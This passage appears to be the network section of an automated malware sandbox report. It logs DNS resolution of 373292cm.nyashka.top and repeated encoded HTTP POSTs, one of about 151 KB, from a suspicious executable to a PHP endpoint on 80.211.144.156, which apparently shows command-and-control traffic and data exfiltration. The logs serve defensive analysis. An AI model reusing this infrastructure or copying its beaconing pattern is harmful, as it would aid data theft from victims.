                                    Aug 25, 2024 15:45:08.788646936 CEST804984180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:08.788928032 CEST804984180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:08.788960934 CEST804984180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:08.789016008 CEST4984180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:08.789190054 CEST804984180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:08.789241076 CEST4984180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:45:08.791230917 CEST804984180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:45:08.792123079 CEST4984180192.168.2.680.211.144.156

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 25, 2024 15:43:30.687942028 CEST5042353192.168.2.61.1.1.1
                                    Aug 25, 2024 15:43:30.873758078 CEST53504231.1.1.1192.168.2.6

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Aug 25, 2024 15:43:30.687942028 CEST192.168.2.61.1.1.10x7787Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Aug 25, 2024 15:43:30.873758078 CEST1.1.1.1192.168.2.60x7787No error (0)373292cm.nyashka.top80.211.144.156A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • 373292cm.nyashka.top

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.64971880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:30.889875889 CEST292OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:31.249459028 CEST344OUTData Raw: 00 01 01 05 03 0d 04 02 05 06 02 01 02 00 01 03 00 02 05 09 02 0c 03 0c 03 05 0c 01 07 0e 01 03 0d 51 06 01 02 51 05 05 0c 53 07 0b 06 01 07 05 05 03 0e 0c 0a 0e 05 04 05 06 04 56 01 03 06 01 03 04 0a 0e 00 06 01 01 0c 55 0d 03 0f 01 0d 01 04 54
                                    Data Ascii: QQSVUTW_U\L~k^r@wLiBwuoSko}vlcXstxRQE{NTIhS`CcYpe~V@x}rNra
                                    Aug 25, 2024 15:43:31.562022924 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:31.655786037 CEST1236INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 1320
                                    Connection: keep-alive
                                    Data Raw: 56 4a 7e 4e 7b 53 5e 59 7b 62 7c 49 6b 61 55 00 7e 59 7b 0b 68 60 54 54 6d 60 6f 5c 7d 5c 60 04 77 4d 69 4f 7a 5f 7d 49 75 66 6b 5b 6a 61 78 01 55 4b 71 09 74 5c 7f 4b 7f 04 75 04 7f 5e 62 0d 79 66 60 08 7e 73 7f 4a 62 62 5f 06 60 58 6a 59 7e 62 62 02 7f 7f 70 4e 7e 5e 77 06 62 5c 7b 06 7c 5b 7d 49 7e 06 6d 07 7b 74 60 06 78 74 6c 00 7b 6e 77 49 6d 5c 52 04 7a 73 75 5a 7d 70 60 02 7b 64 70 49 6a 4c 78 5b 76 4f 64 48 7a 51 41 5b 68 5e 7c 40 7f 71 6e 54 76 52 6b 5f 6f 6c 74 03 77 06 6e 0d 79 62 6d 47 6a 42 54 06 6f 72 66 46 77 63 5e 5a 76 07 64 07 76 71 7a 50 7e 5d 79 5f 77 4c 6e 5d 76 66 74 09 68 6c 66 5d 60 6f 70 04 7f 05 7c 00 78 6f 7b 03 6c 60 66 4b 6b 6d 7c 08 76 67 6f 5c 69 62 65 50 7e 53 5a 53 78 7d 71 5b 7e 62 79 03 7b 5d 46 51 6b 52 5d 52 7d 60 56 0b 7d 77 75 5d 6c 6d 7b 49 7b 71 64 00 7e 71 78 5b 7e 49 55 0a 68 4e 5c 55 7b 63 78 07 7d 61 7c 49 63 5a 7d 51 7b 5c 79 06 75 66 56 4b 7e 58 56 06 7e 66 71 0d 76 72 73 06 7f 5c 5b 05 7f 67 6a 0d 7b 58 74 09 7e 73 67 02 76 62 75 02 76 71 69 00 7c 4f [TRUNCATED]
                                    Data Ascii: VJ~N{S^Y{b|IkaU~Y{h`TTm`o\}\`wMiOz_}Iufk[jaxUKqt\Ku^byf`~sJbb_`XjY~bbpN~^wb\{|[}I~m{t`xtl{nwIm\RzsuZ}p`{dpIjLx[vOdHzQA[h^|@qnTvRk_oltwnybmGjBTorfFwc^ZvdvqzP~]y_wLn]vfthlf]`op|xo{l`fKkm|vgo\ibeP~SZSx}q[~by{]FQkR]R}`V}wu]lm{I{qd~qx[~IUhN\U{cx}a|IcZ}Q{\yufVK~XV~fqvrs\[gj{Xt~sgvbuvqi|Or~|t@~gDuOY{Ly~`iywtxg^MxSYHybdHzcz}``{gx~\svap||Q}g`|qaAv|Zx|tIt`byqeJ~RfxOfFvsswa^var|NrtLiBv[`RyLwRp|]hJxBz`v}`wgR~rvB}SU{mnN}\y}pxAlZNph}YT{CQ{bt~qg}wQ@~`Wys^M}rtFtMqBzO[IuHZ}f|}vu@wbQ\}|gzxXZO~ssubaAtOiqbI~BlA~IUuO{rqI}N_{whywpxCQzblHxsPL{]NZxYsY~qx\wa|}BUYh@}bqAvRwZolUYw^vzqm}BT_z\yvxBagx[L~Jx^bcrT^veoSkRv^wk_|p|K{oglNXh}l`g^jaqTzSYQfn^jfbQYwRS{@QlkPWta^o~Zzu{Z|Xg}Yg~puncx~rtK`]amOj^vcY|fdfive{WOz[hdNTzoVR`V[[nN]bnJUvzyRRL~wkFua{Jy\uJz]OZloBUtAl^Do{AQ\_}]s|lkVTdaNYLwtR`d{ZFQhbO[Ao]Da}UnXFQQz|^]\NtiZDp\@PkeAZq@bUMizYcUCS\wElc[z]zZ~zsWcdAR~aVRn^VTaXQaB [TRUNCATED]
                                    Aug 25, 2024 15:43:31.655832052 CEST241INData Raw: 44 50 7e 66 5b 53 64 06 5f 6f 00 00 09 51 59 60 49 5d 63 0d 5e 5b 62 6d 59 7e 5c 79 67 52 55 59 09 6a 64 63 54 6d 06 60 58 51 71 6e 4a 7a 73 01 5e 7f 76 7f 40 6c 6b 73 45 6f 0b 77 58 7b 75 7f 5f 6f 60 0e 41 50 7c 6f 5d 57 64 00 55 6a 04 0f 42 5c
                                    Data Ascii: DP~f[Sd_oQY`I]c^[bmY~\ygRUYjdcTm`XQqnJzs^v@lksEowX{u_o`AP|o]WdUjB\rYEiocShf}qQpE|UU][uJPbP@QT\WY`_Z[gy`bUx^\^p_O\boNRHcU@iA[RZQca_{SVPpZN_jaNP~No[ChHAPYUHVpoRjgxzZ~G|TV_TsBUbVCQ_PcTQZ@je|p^zRm
                                    Aug 25, 2024 15:43:31.696103096 CEST268OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 384
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:31.901365995 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:31.901577950 CEST384OUTData Raw: 5f 53 5c 53 51 45 54 5e 5b 5f 5a 51 59 53 58 5e 57 59 5d 59 57 50 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\SQET^[_ZQYSX^WY]YWPSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/U0![$]#V))+()-Y"//7Q+47#9^8&F$.Y/5
                                    Aug 25, 2024 15:43:32.201215029 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 57 3d 26 3e 12 31 38 3c 54 27 33 2a 55 29 2d 38 07 3d 04 31 15 27 06 07 17 31 07 27 0d 33 2b 2a 02 29 3d 31 0b 26 3f 06 04 2d 0e 2b 5d 0c 13 21 06 23 29 32 58 24 3c 30 5d 3d 3b 2c 03 22 2c 0c 1e 3c 39 2d 55 3f 01 02 59 3c 00 34 05 28 29 3d 0e 38 01 2a 07 3a 09 29 0e 37 2e 2b 52 0d 11 24 57 3c 2e 21 55 29 07 3b 5f 22 5e 3f 5e 27 13 31 08 26 1c 3a 54 24 3a 30 1f 25 54 21 12 33 08 39 12 26 38 2a 12 26 06 35 56 23 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &W=&>18<T'3*U)-8=1'1'3+*)=1&?-+]!#)2X$<0]=;,",<9-U?Y<4()=8*:)7.+R$W<.!U);_"^?^'1&:T$:0%T!39&8*&5V#"#T,"W3UV
                                    Aug 25, 2024 15:43:32.361114025 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:32.612957001 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:32.613209009 CEST1840OUTData Raw: 5a 57 5c 5e 54 49 54 5b 5b 5f 5a 51 59 51 58 52 57 51 5d 58 57 5f 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZW\^TIT[[_ZQYQXRWQ]XW_S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V._8U8"_ 39*>(+=:<-#7,#Q ?9_ 18&F$.Y/=
                                    Aug 25, 2024 15:43:32.905910969 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 56 2a 25 04 11 26 2b 20 51 33 0a 2e 53 29 2e 27 5f 2b 2e 25 14 30 3b 29 1a 25 10 0d 0d 27 15 21 59 3f 3d 26 51 31 2f 09 10 2d 0e 2b 5d 0c 13 21 06 20 29 39 00 31 05 28 5d 2b 38 05 5d 22 12 04 1e 29 3a 03 55 3c 01 20 58 3c 29 37 11 2a 2a 31 0b 2c 28 0f 16 2e 30 2a 51 22 2e 2b 52 0d 11 24 54 29 2e 39 54 2a 07 3f 5d 22 28 2f 59 24 3e 39 09 32 54 32 55 30 00 38 5d 26 32 32 0e 24 21 36 09 24 2b 31 06 25 3c 3d 50 22 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &V*%&+ Q3.S).'_+.%0;)%'!Y?=&Q1/-+]! )91(]+8]"):U< X<)7**1,(.0*Q".+R$T).9T*?]"(/Y$>92T2U08]&22$!6$+1%<=P"2#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.64971980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:31.997689009 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:32.342020988 CEST2516OUTData Raw: 5f 5c 59 54 54 41 54 5a 5b 5f 5a 51 59 56 58 54 57 58 5d 5f 57 51 53 54 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\YTTATZ[_ZQYVXTWX]_WQST\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/?A6=4^40:><Y<=?7[ ? !+<_;]735Y,&F$.Y/!
                                    Aug 25, 2024 15:43:32.700649023 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:32.829896927 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.64972280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:33.214910030 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:33.569463015 CEST2516OUTData Raw: 5f 55 5c 55 54 40 54 5b 5b 5f 5a 51 59 5e 58 51 57 5a 5d 5f 57 5f 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _U\UT@T[[_ZQY^XQWZ]_W_S_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V._,36=Y"#")4+-9<.;X Z,#!<?:##%Y8&F$.Y/
                                    Aug 25, 2024 15:43:33.887882948 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:34.019633055 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.64972380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:34.298100948 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:34.654220104 CEST2512OUTData Raw: 5f 57 59 54 54 46 54 50 5b 5f 5a 51 59 57 58 5e 57 51 5d 5e 57 5c 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _WYTTFTP[_ZQYWX^WQ]^W\S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,#(6?"0*. <>9+=8#?3W#! <'" =^..&F$.Y/
                                    Aug 25, 2024 15:43:34.968353033 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:35.167907000 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.64972580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:35.523880959 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:35.888590097 CEST2516OUTData Raw: 5f 51 5c 5e 54 44 54 50 5b 5f 5a 51 59 52 58 5e 57 5c 5d 5c 57 51 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _Q\^TDTP[_ZQYRX^W\]\WQS]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.,U'#-\ Z)0+_?#Y ?7R48S+:4##%\,&F$.Y/1
                                    Aug 25, 2024 15:43:36.178261042 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:36.378669977 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.64972680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:36.908601046 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:37.264010906 CEST2516OUTData Raw: 5f 53 59 54 51 44 54 5e 5b 5f 5a 51 59 51 58 5e 57 5c 5d 5e 57 58 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _SYTQDT^[_ZQYQX^W\]^WXS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y,'@5=# )+=Y+=5)=/ S 0P(_7"0:/&F$.Y/=
                                    Aug 25, 2024 15:43:37.570903063 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:37.699767113 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.64972880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:37.926336050 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.64973080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:38.082374096 CEST295OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 151756
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:38.435635090 CEST12360OUTData Raw: 5f 51 59 55 54 41 54 59 5b 5f 5a 51 59 55 58 53 57 58 5d 5a 57 50 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _QYUTATY[_ZQYUXSWX]ZWPS]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.]/ ?!<^#\)=4Y?+#] << 13?7 0]8&F$.Y/-
                                    Aug 25, 2024 15:43:38.440661907 CEST4944OUTData Raw: 3d 59 05 29 3a 5f 57 31 34 04 21 1c 03 5f 1c 05 01 08 07 0e 0e 01 20 22 26 05 06 57 30 07 32 34 2a 2e 1a 28 0d 24 06 3e 08 2e 25 1e 09 0b 3d 14 3d 01 3f 27 0d 20 39 50 30 32 59 0e 09 02 3d 12 3f 07 2a 34 36 08 52 14 3c 58 39 16 04 2d 09 3b 27 39
                                    Data Ascii: =Y):_W14!_ "&W024*.($>.%==?' 9P02Y=?*46R<X9-;'9&>Q$(9\%,$[*%< $![92&^9.##"2>+??>#/880R?2\'644U>4V*764*7'U0]\#Z:<&R&)??!6X0=[;%(6X$;>9W Y"0<ZRX 6-$0+
                                    Aug 25, 2024 15:43:38.440699100 CEST7416OUTData Raw: 3e 2a 40 5c 02 05 3d 55 23 04 28 0e 09 03 1b 1f 3d 3e 36 58 3f 3f 05 13 26 03 2a 5b 3f 3d 1d 24 0b 55 29 5c 2f 54 3c 3a 36 5b 40 0d 3b 22 35 1e 3d 59 23 3a 22 2f 2a 34 29 3c 57 5d 0e 3f 2c 38 34 3d 05 3a 04 5e 19 5d 3f 54 3a 27 32 38 25 3c 28 00
                                    Data Ascii: >*@\=U#(=>6X??&*[?=$U)\/T<:6[@;"5=Y#:"/*4)<W]?,84=:^]?T:'28%<(?$(0.''8\3!!!,5#(Y6Y%<:;;<^]1)Z;=#3[%?)4858X\=2*4>)56#+-16!*\>?!VV($-;X7?2X'_+[.=-%2$+:!A)<U> ^6%"
                                    Aug 25, 2024 15:43:38.440732956 CEST4944OUTData Raw: 00 21 0c 1b 06 23 20 5a 09 28 2b 5c 30 21 04 53 13 3f 27 5d 08 2b 0f 09 3b 21 31 1c 0c 00 27 1d 24 05 35 3c 0e 0b 3f 21 27 23 2d 38 36 30 2f 40 27 59 45 5e 0c 09 49 1a 29 2c 5c 1d 23 3d 14 01 35 3e 24 39 3a 04 20 2e 37 56 06 56 00 28 16 26 3a 21
                                    Data Ascii: !# Z(+\0!S?']+;!1'$5<?!'#-860/@'YE^I),\#=5>$9: .7VV(&:!*63:2+;_4 3"31;+#### =6CV#=*X'0V-,7X,&?;%?\$"/<"W&[\2,#><9</6\+0)_?_3%./;(8.V5]&;,-U8(=7,6>0&5;[[^1<!'X2=? >
                                    Aug 25, 2024 15:43:38.445449114 CEST4944OUTData Raw: 3a 09 17 5c 35 2b 25 08 3f 3b 54 5d 33 23 2c 39 37 57 0c 5c 08 2e 3c 01 26 28 0e 02 37 54 05 3b 21 33 00 10 2c 43 29 20 25 37 33 32 0e 30 03 15 3d 07 02 07 00 58 26 19 24 5f 04 3d 27 22 3f 32 0a 29 00 2b 04 2c 36 56 0f 02 53 5d 2d 31 0a 3a 3a 59
                                    Data Ascii: :\5+%?;T]3#,97W\.<&(7T;!3,C) %7320=X&$_='"?2)+,6VS]-1::Y)=9,X5,& =\))Q'&>Z^(&!U2,V\ 9Y>)>%(/8)#.[T&/1 U0T1=;:,U:03/"7=/X9],2.]Z:9'X*8P>X#2(--*;?,E#%<V&1Y?-]6
                                    Aug 25, 2024 15:43:38.445480108 CEST2472OUTData Raw: 27 01 31 38 3d 05 39 06 39 12 2b 3e 3d 06 2c 39 3b 20 0b 27 2d 5c 2a 38 15 2f 33 5f 3d 5f 57 23 2a 39 2a 1e 00 06 3e 26 03 22 2d 3c 0f 03 09 54 09 03 3b 56 34 07 2a 51 34 5b 02 58 38 06 38 2d 0d 5a 25 27 0a 0b 07 34 38 5f 3f 22 3d 55 36 2f 3f 21
                                    Data Ascii: '18=99+>=,9; '-\*8/3_=_W#*9*>&"-<T;V4*Q4[X88-Z%'48_?"=U6/?!./>96;17 ,1^-1?^;,&)W$88:=.(%"0$U01:41 ;/3);269!%/*3 =# 0?0P%4'?!;;)04/43\#=;?($538<=4-.=(QQT1.#[)/6*8&.P=92
                                    Aug 25, 2024 15:43:38.445591927 CEST2472OUTData Raw: 3f 32 23 2b 07 38 1a 23 20 20 3d 59 05 29 0c 06 04 07 54 14 03 59 1a 3e 31 21 14 2e 39 0b 57 36 0a 3a 1a 24 07 08 0d 28 09 22 03 08 04 37 0c 1e 24 15 05 13 30 09 03 32 05 3a 1a 2c 36 02 55 1c 3e 06 07 5d 0b 2d 50 20 3a 28 2e 05 04 00 29 16 0f 33
                                    Data Ascii: ?2#+8# =Y)TY>1!.9W6:$("7$02:,6U>]-P :(.)3,ZU,<2_-ZY9,X:(%9,-82;2"3'_$(6(6U542'#_3','3<>)C[4<[0Z1!:;;+-:TH=0:69=99Z64<'*>Q-5=,03$>>R'X<:>:=>.] ,XV3'*103#9*#[0
                                    Aug 25, 2024 15:43:38.445652962 CEST2472OUTData Raw: 3c 31 00 32 3a 06 14 11 23 11 26 28 22 29 06 0a 2b 2f 32 39 2a 2c 33 3a 0e 5d 19 22 33 02 32 35 15 3f 1a 25 27 5c 04 1d 24 31 2a 06 39 39 1e 36 13 05 35 5e 3f 55 58 32 0a 32 3d 07 37 23 20 36 21 05 01 03 37 09 00 27 01 02 37 22 27 5a 04 2c 33 2e
